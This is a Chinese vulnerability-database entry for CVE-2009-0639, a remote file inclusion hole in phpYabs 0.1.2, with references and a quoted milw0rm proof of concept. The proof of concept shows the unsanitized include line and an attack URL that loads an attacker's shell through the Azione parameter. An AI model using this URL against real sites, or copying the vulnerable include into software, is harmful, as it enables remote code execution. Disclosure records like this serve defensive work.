phpyabs "moduli/libri/index.php"代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117358 漏洞类型 代码注入
发布时间 2009-02-06 更新时间 2009-03-13
CVE编号 CVE-2009-0639 CNNVD-ID CNNVD-200902-387
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8005
https://cxsecurity.com/issue/WLB-2009020219
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-387
|漏洞详情
phpYabs是一个以Zend框架为基础使用PHP5编写的面向对象的图管理工具,其目标是提供一个简单的操作界面,无论是个人的书籍管理还是图书馆或书店。phpyabs0.1.2版本的moduli/libri/index.php中存在PHP远程文件包含漏洞。远程攻击者可以借助Azione参数的一个URL,执行任意PHP代码。
|漏洞EXP
********************************************************************************
                                             phpyabs 0.1.2 RFI Vulnerability

********************************************************************************
FOUND BY: Arka69
BUG: Remote File Include (RFI)
CMS: phpyabs 0.1.2
SITE: http://exploita.altervista.org
********************************************************************************

VULNERABLE CODE: (phpyabs/moduli/libri/index.php)

  include($_GET['Azione'].".php");

********************************************************************************
RFI:

http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL]

# milw0rm.com [2009-02-06]
|参考资料

来源:VUPEN
名称:ADV-2009-0361
链接:http://www.vupen.com/english/advisories/2009/0361
来源:BID
名称:33670
链接:http://www.securityfocus.com/bid/33670
来源:MILW0RM
名称:8005
链接:http://www.milw0rm.com/exploits/8005